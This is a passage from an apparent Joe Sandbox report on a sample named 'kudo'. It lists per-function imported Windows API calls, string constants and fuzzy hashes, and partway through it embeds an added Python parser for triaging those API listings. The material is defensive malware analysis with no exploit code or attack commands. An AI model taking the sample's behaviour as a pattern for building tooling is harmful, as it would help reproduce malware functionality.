                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                      • String ID: 0$F
                                                      • API String ID: 176399719-3044882817
                                                      • Opcode ID: 7c344b8e6dedd9936999ad254c1b7b4875776a6ec3ab69a9975961caae0fe11e
                                                      • Instruction ID: 4460715b8e1eefb9529657dfc603eacbd611d28f67e5f24cfb3d0c8caf4f644c
                                                      • Opcode Fuzzy Hash: 7c344b8e6dedd9936999ad254c1b7b4875776a6ec3ab69a9975961caae0fe11e
                                                      • Instruction Fuzzy Hash: FF411B75A01209EFDB20EFA4D988E9A7BB5FF49350F244029FA56D7361D731A910CF90
                                                      APIs
                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000), ref: 0088755E
                                                      • CreateCompatibleDC.GDI32(00000000), ref: 00887565
                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00887578
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00887580
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0088758B
                                                      • DeleteDC.GDI32(00000000), ref: 00887594
                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0088759E
                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 008875B2
                                                      • DestroyWindow.USER32(?), ref: 008875BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                      • String ID: static
                                                      • API String ID: 2559357485-2160076837
                                                      • Opcode ID: 7a9b0b18de13a91b3a7bf2bee21a4c239ace71e2fb9d60404c5b16b223f64148
                                                      • Instruction ID: 8b90590a892c37161ad562225a503597ed64d48c26d416b7365ea69b73587477
                                                      • Opcode Fuzzy Hash: 7a9b0b18de13a91b3a7bf2bee21a4c239ace71e2fb9d60404c5b16b223f64148
                                                      • Instruction Fuzzy Hash: 10316A32104215ABDF12AF68DC09FEA3B79FF49320F210224FA15E61A1D731D821DBA4
                                                      APIs
                                                      • _memset.LIBCMT ref: 00826E3E
                                                        • Part of subcall function 00828B28: __getptd_noexit.LIBCMT ref: 00828B28
                                                      • __gmtime64_s.LIBCMT ref: 00826ED7
                                                      • __gmtime64_s.LIBCMT ref: 00826F0D
                                                      • __gmtime64_s.LIBCMT ref: 00826F2A
                                                      • __allrem.LIBCMT ref: 00826F80
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00826F9C
                                                      • __allrem.LIBCMT ref: 00826FB3
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00826FD1
                                                      • __allrem.LIBCMT ref: 00826FE8
                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00827006
                                                      • __invoke_watson.LIBCMT ref: 00827077
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                      • String ID:
                                                      • API String ID: 384356119-0
                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                      • Instruction ID: cfe2db2517d69aa1237f82bcd127610e5447ee2290bf33b97d6eef37930c4d6b
                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                      • Instruction Fuzzy Hash: 6571E476A00B26ABDB14AE7DEC41B5AB3A8FF44324F14422AF514D7281F770EA9487D1
                                                      APIs
                                                      • _memset.LIBCMT ref: 00862542
                                                      • GetMenuItemInfoW.USER32(008C5890,000000FF,00000000,00000030), ref: 008625A3
                                                      • SetMenuItemInfoW.USER32(008C5890,00000004,00000000,00000030), ref: 008625D9
                                                      • Sleep.KERNEL32(000001F4), ref: 008625EB
                                                      • GetMenuItemCount.USER32(?), ref: 0086262F
                                                      • GetMenuItemID.USER32(?,00000000), ref: 0086264B
                                                      • GetMenuItemID.USER32(?,-00000001), ref: 00862675
                                                      • GetMenuItemID.USER32(?,?), ref: 008626BA
                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00862700
                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862714
                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00862735
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                      • String ID:
                                                      • API String ID: 4176008265-0
                                                      • Opcode ID: da1c4645b1e10060acdd149c134c764d5bf99970a9c0eed1164977c35d86414f
                                                      • Instruction ID: 5f77916c4306bb96d290a1adb4692ca7c0b16e3ec28088f1cf32cb53b6a552b0
                                                      • Opcode Fuzzy Hash: da1c4645b1e10060acdd149c134c764d5bf99970a9c0eed1164977c35d86414f
                                                      • Instruction Fuzzy Hash: 1F61B2B0900A49AFDF21DFA8DC88DBE7BB9FB01348F1541A9E942E7251D731AD05DB21
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00886FA5
                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00886FA8
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00886FCC
                                                      • _memset.LIBCMT ref: 00886FDD
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00886FEF
                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00887067
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$LongWindow_memset
                                                      • String ID:
                                                      • API String ID: 830647256-0
                                                      • Opcode ID: 1aae85d4144ff0caaab470afeee9b85fac275c904ee780e0619bf9830990e211
                                                      • Instruction ID: af0933d381ba72a9638a042d304cd30123acd194253aef2a26cfc5d4965f4ff1
                                                      • Opcode Fuzzy Hash: 1aae85d4144ff0caaab470afeee9b85fac275c904ee780e0619bf9830990e211
                                                      • Instruction Fuzzy Hash: 91615A75900208AFDB11DFA8CC85EEE77B8FB09710F244169FA14EB2A1D771AD45DB90
                                                      APIs
                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00856BBF
                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00856C18
                                                      • VariantInit.OLEAUT32(?), ref: 00856C2A
                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00856C4A
                                                      • VariantCopy.OLEAUT32(?,?), ref: 00856C9D
                                                      • SafeArrayUnaccessData.OLEAUT32(?,00000002,?,?,?,?,?,?,?,00856950), ref: 00856CB1
                                                      • VariantClear.OLEAUT32(?), ref: 00856CC6
                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00856CD3
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00856CDC
                                                      • VariantClear.OLEAUT32(?), ref: 00856CEE
                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00856CF9
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                      • String ID:
                                                      • API String ID: 2706829360-0
                                                      • Opcode ID: 92a8d98c32f66243b0dc7bfcb78b0430f8cc4630672b7a94796ccbd8cfd43e89
                                                      • Instruction ID: 2b04cb8110c6923de0cd8f13b8e394a532634b6bed7f849e9b395470b9e3a055
                                                      • Opcode Fuzzy Hash: 92a8d98c32f66243b0dc7bfcb78b0430f8cc4630672b7a94796ccbd8cfd43e89
                                                      • Instruction Fuzzy Hash: D6415E71A002199FCF00DFA8D8449AEBBB9FF08355F408069ED55E7262DB30AD59CB95
                                                      APIs
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • CoInitialize.OLE32 ref: 00878403
                                                      • CoUninitialize.OLE32 ref: 0087840E
                                                      • CoCreateInstance.OLE32(?,00000000,00000017,00892BEC,?), ref: 0087846E
                                                      • IIDFromString.OLE32(?,?), ref: 008784E1
                                                      • VariantInit.OLEAUT32(?), ref: 0087857B
                                                      • VariantClear.OLEAUT32(?), ref: 008785DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                      • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                      • API String ID: 834269672-1287834457
                                                      • Opcode ID: d0e138cb85606ea5b5eac8de82badd6b464296461759c1d9e05cfadd74793f47
                                                      • Instruction ID: 6f7bdaa70f8f9a952785ec6caf8b76470009e12566240bb4e6f0df814dc5a297
                                                      • Opcode Fuzzy Hash: d0e138cb85606ea5b5eac8de82badd6b464296461759c1d9e05cfadd74793f47
                                                      • Instruction Fuzzy Hash: ED617B70648312DFC710DF28C849A6ABBE8FF49754F048519F989DB292CB70ED48CB96
                                                      APIs
                                                      • WSAStartup.WS2_32(00000101,?), ref: 00875793
                                                      • inet_addr.WS2_32(?), ref: 008757D8
                                                      • gethostbyname.WS2_32(?), ref: 008757E4
                                                      • IcmpCreateFile.IPHLPAPI ref: 008757F2
                                                      • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00875862
                                                      • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00875878
                                                      • IcmpCloseHandle.IPHLPAPI(00000000), ref: 008758ED
                                                      • WSACleanup.WS2_32 ref: 008758F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                      • String ID: Ping
                                                      • API String ID: 1028309954-2246546115
                                                      • Opcode ID: 6c30265f91edb31ca6572864d89883a4b8f4b3c39b33ce9576f3d1c149e511d3
                                                      • Instruction ID: 23b5532bc70271d9c041daaf96e742a4802de1ce1ccf6c1634f6736f9f2af605
                                                      • Opcode Fuzzy Hash: 6c30265f91edb31ca6572864d89883a4b8f4b3c39b33ce9576f3d1c149e511d3
                                                      • Instruction Fuzzy Hash: 0F516F716046009FDB10AF28DC85B2A7BE4FF48724F148569F99ADB2E5DB70E900DB52
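The "APIs" listings above are the most useful part of these function blocks for triage, but the arguments are printed as raw hex immediates (the ICMP function, for example, passes 00000FA0 and 00000101). The following is an added example, not part of the Joe Sandbox report or of the analysed sample: a small Python parser for this line format that resolves the immediates and groups a function's imports by module, so that blocks touching network or COM APIs can be picked out of a long report. The sample lines are copied from the function blocks on this page; the module groupings used for flagging are this example's own assumption, not Joe Sandbox categories.

```python
"""Parse the per-function "APIs" listing of a Joe Sandbox report.

Added example for this page; not part of Joe Sandbox or of the analysed
sample. It reads lines in the format printed in the report, e.g.
    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00875862
and resolves the hex immediates so timeouts, sizes and message ids can be
read off directly. The SAMPLE_* texts are copied from function blocks on
this page; the module groupings are this example's own triage assumption.
"""
import re
from dataclasses import dataclass, field
from typing import Optional

# symbol.MODULE(optional args), ref: address -- with an optional sub-call prefix
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<name>\S+?)\.(?P<module>[A-Z][A-Z0-9_]*)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
_HEX = re.compile(r"^-?[0-9A-F]+$")

# Assumed triage groupings (not Joe Sandbox categories): modules whose presence
# in a function is worth a closer look when skimming thousands of these blocks.
NETWORK_MODULES = {"WS2_32", "IPHLPAPI", "WININET", "WINHTTP", "URLMON"}
COM_MODULES = {"OLE32", "OLEAUT32"}

# Copied from the ICMP function block on this page.
SAMPLE_PING = """
• WSAStartup.WS2_32(00000101,?), ref: 00875793
• inet_addr.WS2_32(?), ref: 008757D8
• gethostbyname.WS2_32(?), ref: 008757E4
• IcmpCreateFile.IPHLPAPI ref: 008757F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00875862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00875878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 008758ED
• WSACleanup.WS2_32 ref: 008758F3
"""

# Individual lines taken from three other blocks on this page (COM object
# creation and the drive-status function), to exercise sub-call prefixes,
# argument-less calls and string-constant arguments.
SAMPLE_MIXED = """
  • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
• CoInitialize.OLE32 ref: 00878403
• CoCreateInstance.OLE32(?,00000000,00000017,00892BEC,?), ref: 0087846E
• SetErrorMode.KERNEL32(00000000,READY), ref: 0086B5BD
"""


@dataclass
class ApiCall:
    name: str
    module: str
    ref: int                                   # address of the call site
    args: list = field(default_factory=list)   # int, None for '?', or str literal
    caller: Optional[int] = None               # set for "Part of subcall function" lines


def parse_arg(tok: str):
    """'?' is a value the sandbox could not recover; hex immediates become ints;
    anything else (e.g. READY) is kept as the printed string constant."""
    tok = tok.strip()
    if tok == "?":
        return None
    if _HEX.match(tok):
        return int(tok, 16)    # e.g. 00000FA0 -> 4000, -00000001 -> -1
    return tok


def parse_api_lines(text: str) -> list:
    """Return one ApiCall per API line; headers such as 'APIs'/'Strings' are skipped."""
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        caller = int(m["caller"], 16) if m["caller"] else None
        calls.append(ApiCall(m["name"], m["module"], int(m["ref"], 16), args, caller))
    return calls


def summarise(calls: list) -> dict:
    """Group imports by module and flag network / COM usage for triage."""
    by_module = {}
    for c in calls:
        by_module.setdefault(c.module, []).append(c.name)
    return {
        "modules": by_module,
        "network": sorted({c.name for c in calls if c.module in NETWORK_MODULES}),
        "com": sorted({c.name for c in calls if c.module in COM_MODULES}),
        "span": (min(c.ref for c in calls), max(c.ref for c in calls)) if calls else None,
    }
```

Run over the ICMP block, the parser reports the two IcmpSendEcho calls with a 5-byte payload and a 4000 ms timeout, and a WSAStartup version argument of 0x0101; run over a whole exported report, the `network` and `com` lists make it quick to separate library helpers such as this ping routine from functions that actually move data off the host.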
                                                      APIs
                                                      • SetErrorMode.KERNEL32(00000001), ref: 0086B4D0
                                                      • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0086B546
                                                      • GetLastError.KERNEL32 ref: 0086B550
                                                      • SetErrorMode.KERNEL32(00000000,READY), ref: 0086B5BD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                       • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmp
                                                       • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Error$Mode$DiskFreeLastSpace
                                                      • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                      • API String ID: 4194297153-14809454
                                                      • Opcode ID: 22b41b9ec8c5f382368ef429f7b80674028f11ece3e4b6133af04ada6c8f6abe
                                                      • Instruction ID: e41dd9c973ac94c7229e6228edd5bb75be086ec9484acbda04886bd3f80c94bf
                                                      • Opcode Fuzzy Hash: 22b41b9ec8c5f382368ef429f7b80674028f11ece3e4b6133af04ada6c8f6abe
                                                      • Instruction Fuzzy Hash: 48318F35A00209EFCB11EF68CC89AEE7BB4FF09318F114125E616DB292DB709A81CB51
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00859014
                                                      • GetDlgCtrlID.USER32 ref: 0085901F
                                                      • GetParent.USER32 ref: 0085903B
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 0085903E
                                                      • GetDlgCtrlID.USER32(?), ref: 00859047
                                                      • GetParent.USER32(?), ref: 00859063
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 00859066
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: a4e9100bbd786478fa287fa25388016c248ed766db52398b0ca158683592e307
                                                      • Instruction ID: e606a06227a374939b7b3a8a89d78725f13c6c417e9d649d290320f7a04063bd
                                                      • Opcode Fuzzy Hash: a4e9100bbd786478fa287fa25388016c248ed766db52398b0ca158683592e307
                                                      • Instruction Fuzzy Hash: 8621A170A00108BBDF15ABA8CC85EFEBB65FF59310F100265FA61972E2EB755819DB21
                                                      APIs
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                        • Part of subcall function 0085AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0085AABC
                                                      • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008590FD
                                                      • GetDlgCtrlID.USER32 ref: 00859108
                                                      • GetParent.USER32 ref: 00859124
                                                      • SendMessageW.USER32(00000000,?,00000111,?), ref: 00859127
                                                      • GetDlgCtrlID.USER32(?), ref: 00859130
                                                      • GetParent.USER32(?), ref: 0085914C
                                                      • SendMessageW.USER32(00000000,?,?,00000111), ref: 0085914F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 1536045017-1403004172
                                                      • Opcode ID: 131366abcb4d630e3d45d7553377e6955bc7278cc8ad59c68d19eb2ca7b3ff3d
                                                      • Instruction ID: b704d4391ee5c16b2d55d0f348299b8520abd9122e158bd1d6ed0d8f0dfca833
                                                      • Opcode Fuzzy Hash: 131366abcb4d630e3d45d7553377e6955bc7278cc8ad59c68d19eb2ca7b3ff3d
                                                      • Instruction Fuzzy Hash: 4921C474A00108BBDF11ABA8CC85EFEBB65FF55301F100115FA51D72A2EB795419DB21
                                                      APIs
                                                      • GetParent.USER32 ref: 0085916F
                                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 00859184
                                                      • _wcscmp.LIBCMT ref: 00859196
                                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00859211
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameParentSend_wcscmp
                                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                      • API String ID: 1704125052-3381328864
                                                      • Opcode ID: 860e1113e6603673840a4c2b644293898a69d13b92cd9859c8af42cb50e514ec
                                                      • Instruction ID: 3ed7c647c962af8c418de9b52b1dfe221d9bc3cfe44614226353583cc7c83ec6
